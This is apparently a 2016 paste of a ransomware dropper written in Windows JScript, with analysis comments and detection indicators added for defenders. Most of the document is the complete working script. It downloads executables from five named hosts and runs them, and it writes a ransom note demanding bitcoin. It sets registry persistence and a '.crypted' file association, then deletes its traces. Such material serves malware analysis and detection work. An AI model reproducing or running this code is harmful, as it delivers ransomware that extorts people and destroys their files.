dynamoo

Malicious Javascript

Aug 2nd, 2016
  // ANALYSIS NOTES (added for defenders). The statements below are the sample as pasted,
  // only re-broken onto separate lines so it can be read; the paste's "1." line-number
  // gutter and a stray line break inside one string literal are extraction residue.
  //
  // What it is: a Windows Script Host (JScript) dropper. It relies only on built-in COM
  // objects: WScript.Shell, Msxml2.XMLHTTP, ADODB.Stream, Scripting.FileSystemObject.
  //
  // Flow visible in this script:
  //   1. Do nothing at all if %TEMP%\a.txt already exists.
  //   2. Run five download rounds (n = 1..5) over plain HTTP against the hosts in `ll`.
  //      Responses larger than 1000 bytes are saved as %TEMP%\a1.exe and %TEMP%\a2.exe
  //      (each launched immediately), then %TEMP%\a.exe, %TEMP%\php4ts.dll, %TEMP%\a.php.
  //   3. Only if a.exe, php4ts.dll and a.php all exist: write the ransom note to
  //      %TEMP%\a.txt, add a Run key and a ".crypted" file association, copy the note to
  //      the desktop as DECRYPT.txt, run `a.exe a.php` hidden and wait for it, open the
  //      note in Notepad, then overwrite a.php and delete the staged files.
  //
  // NOTE(review): no encryption code is present here. Presumably a.exe is a PHP
  // interpreter (php4ts.dll is staged beside it) and a.php does the file work; confirm
  // against the downloaded artifacts. The "RSA-1024" wording is only a claim in the note.
  // NOTE(review): the pattern resembles what was publicly reported in 2016 as
  // Nemucod-delivered ".crypted" ransomware; treat that attribution as unconfirmed.
  //
  // Hunting / detection points that follow directly from the code:
  //   - wscript.exe / cscript.exe issuing HTTP GETs to /counter/?ad=...&id=...&rnd=...
  //   - a script host writing a1.exe / a2.exe / a.exe / php4ts.dll / a.php into %TEMP%
  //     and then launching executables from there
  //   - HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run value "Crypted"
  //   - HKCR\.crypted and HKCR\Crypted\shell\open\command
  //   - DECRYPT.txt appearing on the user's desktop

  // Value sent to the server as the `id` query parameter; presumably a campaign or
  // victim identifier (its meaning is not shown here).
  var id="LRYB9RcpANpqAc9lNDOe_7o65Gns30h8ZhRx1DBunTW-YHmZvSONzPHomHt9FRlRl53IG-8U9s47bw";
  // Bitcoin address: sent as the `ad` parameter and printed in the ransom note.
  var ad="15R1q8XJmfZUGNy4cWGocZBEVeMsXfECpZ";
  // Ransom amount in BTC as printed in the note.
  var bc="0.54235";
  // Index into `ll` of the last host that returned a usable response.
  var ld=0;
  // cq = double quote (char 34), cs = backslash (char 92); used to assemble paths and
  // quoted command lines without literal quote/backslash characters in the source.
  var cq=String.fromCharCode(34);
  var cs=String.fromCharCode(92);
  // Download hosts (historical IoCs). NOTE(review): these look like ordinary third-party
  // sites, so presumably compromised rather than attacker-registered; not verifiable here.
  var ll=["opros.mskobr.ru","alacahukuk.com","www.ortoservis.ru","aksoypansiyon.com","samurkasgrup.com"];
  var ws=WScript.CreateObject("WScript.Shell");
  // fn = %TEMP%\a (base name for every staged file); pd = %TEMP%\php4ts.dll
  var fn=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"a";
  var pd=ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php4ts.dll";
  var xo=WScript.CreateObject("Msxml2.XMLHTTP");
  var xa=WScript.CreateObject("ADODB.Stream");
  var fo=WScript.CreateObject("Scripting.FileSystemObject");
  // Marker check: the presence of %TEMP%\a.txt (the ransom note) makes the script a no-op.
  if (!fo.FileExists(fn+".txt")) {
      // One round per artifact; n selects what the response is saved as.
      for(var n=1;n<=5;n++) {
          // Start from the last host that worked and fall through the rest on failure.
          for(var i=ld;i<ll.length;i++) {
              var dn=0;
              try {
                  // Synchronous GET; `rnd` is the host index and round number concatenated.
                  xo.open("GET","http://"+ll[i]+"/counter/?ad="+ad+"&id="+id+"&rnd="+i+n, false);
                  xo.send();
                  if(xo.status==200) {
                      // type=1 is a binary stream; the raw response body is buffered into it.
                      xa.open(); xa.type=1; xa.write(xo.responseBody);
                      // Responses of 1000 bytes or fewer are ignored; the next host is tried.
                      if(xa.size>1000) {
                          dn=1;
                          // Rounds 1-2: save as a1.exe / a2.exe (2 = overwrite) and launch at
                          // once without waiting; launch errors are swallowed.
                          if(n<=2){xa.saveToFile(fn+n+".exe",2);try{ws.Run(fn+n+".exe",1,0);}catch(er){};}
                          // Round 3: a.exe, round 4: php4ts.dll, round 5: a.php (saved only).
                          else if(n==3){xa.saveToFile(fn+".exe",2);}
                          else if(n==4){xa.saveToFile(pd,2);}
                          else if(n==5){xa.saveToFile(fn+".php",2);}
                      };
                      xa.close();
                  };
                  // Remember the working host and move on to the next round.
                  if(dn==1){ld=i;break;};
              } catch(er){};  // network/COM errors are silently ignored
          };
      };
      // Everything below runs only when all three payload components were retrieved.
      if(fo.FileExists(fn+".exe") && fo.FileExists(pd) && fo.FileExists(fn+".php")) {
          // Ransom note written to %TEMP%\a.txt (this file is also the marker checked above).
          var fp=fo.CreateTextFile(fn+".txt",true);
          fp.WriteLine("ATTENTION!");
          fp.WriteLine("");
          fp.WriteLine("All your documents, photos, databases and other important personal files");
          fp.WriteLine("were encrypted using strong RSA-1024 algorithm with a unique key.");
          fp.WriteLine("To restore your files you have to pay "+bc+" BTC (bitcoins).");
          fp.WriteLine("Please follow this manual:");
          fp.WriteLine("");
          fp.WriteLine("1. Create Bitcoin wallet here:");
          fp.WriteLine("");
          fp.WriteLine("      https://blockchain.info/wallet/new");
          fp.WriteLine("");
          fp.WriteLine("2. Buy "+bc+" BTC with cash, using search here:");
          fp.WriteLine("");
          fp.WriteLine("      https://localbitcoins.com/buy_bitcoins");
          fp.WriteLine("");
          fp.WriteLine("3. Send "+bc+" BTC to this Bitcoin address:");
          fp.WriteLine("");
          fp.WriteLine("      "+ad);
          fp.WriteLine("");
          fp.WriteLine("4. Open one of the following links in your browser to download decryptor:");
          fp.WriteLine("");
          // The same hosts are listed in the note, with a different query string (?a=).
          for (var i=0;i<ll.length;i++) {
              fp.WriteLine("      http://"+ll[i]+"/counter/?a="+ad);
          };
          fp.WriteLine("");
          fp.WriteLine("5. Run decryptor to restore your files.");
          fp.WriteLine("");
          fp.WriteLine("PLEASE REMEMBER:");
          fp.WriteLine("");
          fp.WriteLine("      - If you do not pay in 3 days YOU LOOSE ALL YOUR FILES.");
          fp.WriteLine("      - Nobody can help you except us.");
          fp.WriteLine("      - It`s useless to reinstall Windows, update antivirus software, etc.");
          fp.WriteLine("      - Your files can be decrypted only after you make payment.");
          fp.WriteLine("      - You can find this manual on your desktop (DECRYPT.txt).");
          fp.Close();
          // Persistence: HKCU Run value "Crypted" pointing at the note, so it is opened at logon.
          ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCU"+cs+"SOFTWARE"+cs+"Microsoft"+cs+"Windows"+cs+"CurrentVersion"+cs+"Run"+cq+" /V "+cq+"Crypted"+cq+" /t REG_SZ /F /D "+cq+fn+".txt"+cq,0,0);
          // File association: ".crypted" -> ProgID "Crypted" ...
          ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+".crypted"+cq+" /ve /t REG_SZ /F /D "+cq+"Crypted"+cq,0,0);
          // ... whose open command shows the note in Notepad instead of opening the file.
          ws.Run("%COMSPEC% /c REG ADD "+cq+"HKCR"+cs+"Crypted"+cs+"shell"+cs+"open"+cs+"command"+cq+" /ve /t REG_SZ /F /D "+cq+"notepad.exe "+cs+cq+fn+".txt"+cs+cq+cq,0,0);
          // The note is copied as DECRYPT.txt to two candidate desktop locations.
          ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%AppData%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0);
          ws.Run("%COMSPEC% /c copy /y "+cq+fn+".txt"+cq+" "+cq+"%UserProfile%"+cs+"Desktop"+cs+"DECRYPT.txt"+cq,0,0);
          // Main payload: `a.exe a.php`, hidden window (0), and the only call that waits for
          // completion (last argument 1) before the script continues.
          ws.Run("%COMSPEC% /c "+fn+".exe "+cq+fn+".php"+cq,0,1);
          ws.Run("%COMSPEC% /c notepad.exe "+cq+fn+".txt"+cq,0,0);
          // a.php is overwritten with 1000 lines of the Bitcoin address before deletion;
          // presumably to hinder recovery of the original script from disk. Forensics: the
          // on-disk a.php content after execution is not the payload.
          var fp=fo.CreateTextFile(fn+".php",true);for(var i=0;i<1000;i++){fp.WriteLine(ad);};fp.Close();
          // Cleanup of the staged components. a1.exe / a2.exe are not deleted by this script.
          ws.Run("%COMSPEC% /c DEL "+cq+fn+".php"+cq,0,0);
          ws.Run("%COMSPEC% /c DEL "+cq+fn+".exe"+cq,0,0);
          ws.Run("%COMSPEC% /c DEL "+cq+pd+cq,0,0);
      };
  };